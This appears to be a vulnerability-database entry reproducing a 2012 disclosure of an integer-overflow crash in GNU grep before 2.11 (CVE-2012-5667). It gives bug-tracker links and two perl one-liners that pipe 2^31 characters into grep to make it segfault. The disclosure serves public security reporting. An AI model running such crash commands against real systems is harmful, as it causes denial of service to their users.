Grep < 2.11 Integer Overflow Crash PoC

2014-07-0100:00:00

Root

www.seebug.org

0.007 Low

EPSS

Percentile

80.8%

JSON

No description provided by source.


                                                Grep &#60;2.11 is vulnerable to int overflow exploitation.

http://lists.gnu.org/archive/html/bug-grep/2012-03/msg00007.html

Although it is patched in the recent Grep,
This update has not been pushed to the Ubuntu repos, or the Redhat
repos, leaving 99% of those OS&#39;s(and more) vulnerable.


There are also many other ways to do this bug.

It is low severity because it would be extremely hard to actually
exploit it, and it is a local exploit, and it is not run by root.

Found By: Security Researcher - Joshua Rogers


More:
https://bugzilla.redhat.com/show_bug.cgi?id=889935
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473
http://seclists.org/oss-sec/2012/q4/504
etc.

#There are many ways of doing this.

#Method one:
$ perl -e &#39;print &#34;x&#34;x(2**31)&#39; | grep x &#62; /dev/null
Segmentation fault (core dumped)


#Method two:
$ perl -e &#39;print &#34;\nx&#34;x(2**31)&#39; | grep -c x &#62; /dev/null


Twitter: https://twitter.com/MegaManSec


CVE: CVE-2012-5667
-- 
*Joshua Rogers* - Retro Game Collector && IT Security Specialist
gpg pubkey &#60;http://www.internot.info/docs/gpg_pubkey.asc.gpg&#62;